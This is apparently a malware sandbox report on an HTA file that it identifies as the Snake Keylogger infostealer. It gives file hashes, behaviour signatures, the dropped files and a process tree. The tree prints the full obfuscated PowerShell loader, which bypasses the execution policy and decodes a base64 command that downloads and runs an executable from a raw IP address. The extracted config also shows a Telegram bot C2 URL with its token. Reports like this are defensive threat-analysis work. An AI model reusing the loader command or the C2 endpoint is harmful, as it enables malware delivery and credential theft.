Overview

overview

10

Static

static

1

wethinkabo...at.hta

windows7-x64

10

wethinkabo...at.hta

windows10-2004-x64

8

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-10-2024 12:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    wethinkaboutthegreatsolutionforgreat.hta

  • Size

    129KB

  • MD5

    7a368478a9772fc6e87e8eda7ec7f7b3

  • SHA1

    237eff7ffb66ca9507fdbd5512506ef4cf81a22d

  • SHA256

    7e041a3670abd581eb735dab3a66975fafd7e921bb0f94a36b98829248462f8b

  • SHA512

    114aa191194efec173adc3ab137eab58454854efa5109da30364b54108a74ccf68b66c659a9609ece5933aa72ab5997f7b93e510e37a51ebed51d903cbc4fe17

  • SSDEEP

    96:Eam73EjaILjaeRVfr+ZqTF1OF3ja3jalHjaj7T:Ea23EuauoVj+IGu3u1uPT

Score
10/10
snakekeyloggercollectiondefense_evasiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
    defense_evasionexecution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wethinkaboutthegreatsolutionforgreat.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\SysWOW64\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE
      "C:\Windows\SYSTeM32\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE" "PoWErsHElL -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT ; Iex($(ieX('[sYStEm.tExT.eNcodiNg]'+[char]0X3A+[char]0X3A+'UtF8.GeTstriNG([SySteM.coNverT]'+[chAr]58+[Char]58+'FROmBaSe64STring('+[CHaR]34+'JEdDeWxIWDRPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJERUZJTkl0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhGeExZSG5NUUosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0b3csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3llUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeFJ6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImloRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR0N5bEhYNE91OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMzAyL3Rhc2tob3N0d3MuZXhlIiwiJGVOdjpBUFBEQVRBXHRhc2tob3N0d3MuZXhlIiwwLDApO1NUQVJ0LVNsZWVwKDMpO3NUYVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHRhc2tob3N0d3MuZXhlIg=='+[chaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2804
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5m13dxof.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF5D4.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2256
      • C:\Users\Admin\AppData\Roaming\taskhostws.exe
        "C:\Users\Admin\AppData\Roaming\taskhostws.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2044
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostws.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1880

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\5m13dxof.dll
    Filesize

    3KB

    MD5

    0cf76568dadfefbb0c1e4cfd8fca5b49

    SHA1

    930830e6687448aaee50d2d215f24b2a16148552

    SHA256

    f8d335fcbf9558ff5ee7c878c3a113d1087e8b4ffe08a1500613a9152c057142

    SHA512

    c6764cf9eaeda5c9288a9ba53b3c3052830cf60335799ee8fcb8e3ce787f5f71ab0bc30d3da9021891738004d5c584adbb54bceee136cd7f4bdd3bd7bd07ba9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\5m13dxof.pdb
    Filesize

    7KB

    MD5

    8eab07f53d94073a46e3f06a7fd39a34

    SHA1

    984c4eeef449abfa446f2aa317bcd57cb2b9e583

    SHA256

    db14b1fe7bd042256328f3ee3c3e94d0c0916089bbe5592b848dbee3612cfaeb

    SHA512

    adc0b75bbf1110caf025e7e7c8e0cf15b77fb06729a53755414e0e9e73f74ea82e1d074627a6ce5c04aa3e9f98cff47d5c2874ef1017aa12ea471825d7dcf57e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\RESF5E4.tmp
    Filesize

    1KB

    MD5

    86ea811e6931f0600efa5a75b73e27a9

    SHA1

    5096344062a6d36b919035153736e420405b2eec

    SHA256

    da4e0ca9a542804d238592e83c13d199516a40921188a16e847728d35164b662

    SHA512

    e054b229d6af1f7986815efd0ae26e566ad9f9ceb765f2d78396c03b7b486ed16923a2e43b21d574574303e946ef0bab038572e87ba97488ae8ea10d3acd8f01

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    6085be2c24c443d93e96b1d0f657ec34

    SHA1

    195929fab117f2320166fe9178dcd92432f344df

    SHA256

    184221735cfdbd418ec9e5113dfb88c1c04a23ba8e3806c844bd35af50a20e64

    SHA512

    849058cfee01fd8aa06ca0c8c6f33ef97b0df34d018e929c17c3a608ef28a42e7c1c16f16422f947ba966ac393930f974af75f493cd780e1b339fdfddfaec09f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\taskhostws.exe
    Filesize

    938KB

    MD5

    b47e4f366b08fe509c2a8f9ee7251f51

    SHA1

    3338dd3e335d1e8e6ee0d4c0c607248d333c25c1

    SHA256

    03461c2a07431aed5ff68bbcf42d7ef82f32190b44ba140befd3f474614b5f3d

    SHA512

    277032b371ca4992657c172995186b4593197a91c784e84b1b5652478d462b84792e8b10480ecf0eb05e4ce4130575c59f0f14d197d4e0d77c70c0bd6989aaec

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\5m13dxof.0.cs
    Filesize

    460B

    MD5

    7d449c3b022ff885a410d7d58f117516

    SHA1

    5a4642c0a7a8745d9aad5243fa3dbdfa42fcd01c

    SHA256

    d82eab2c4860d52330cd6aefa6051d4b53566de18f6665b1140d59d79fd436e5

    SHA512

    3683fb94132803f56fbb7188f51c097c59a4c2297cd66e88571836d4b040ae8b15cafee7f2ce747f1cc8326a8144b4e0c262bd954211adc9d65c70f9e8c645d3

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\5m13dxof.cmdline
    Filesize

    309B

    MD5

    5d154e184f893d69cf6da6f677c32a05

    SHA1

    4865ee0c2b2559d32e8b9926c8b06ab6d2ca81f2

    SHA256

    ac3716f84f903788af05ca839c15bc352dc26032c73bf53facb7b7711287e7a9

    SHA512

    0524a4214aeae19b7cdcca31350267f071349b9c7438a492fa866222d9eaafd479ed2d44abffc2d223761d1c2ede27ffa84f1a67ae8c06267c1fac09e00b5f15

    Download Submit

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF5D4.tmp
    Filesize

    652B

    MD5

    e10feae979444bf34c133e4cdeadfd13

    SHA1

    f48f8d4660ee76deb2c2eb994a64d729fd09a2b9

    SHA256

    593471bdb3c27ad9a44dc23f93d29002db5a85e38c2b1910d3b71b1649072567

    SHA512

    ca7206519331eec58b309d14bb2a65d7b8e965fef2858411fbd6a4ebc9e8f0449eb2d4aa065d5143f5038aac66c20fb878a503a491c21ac401fb164cca1c13dd

    Download Submit

  • memory/1880-34-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1880-35-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1880-36-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download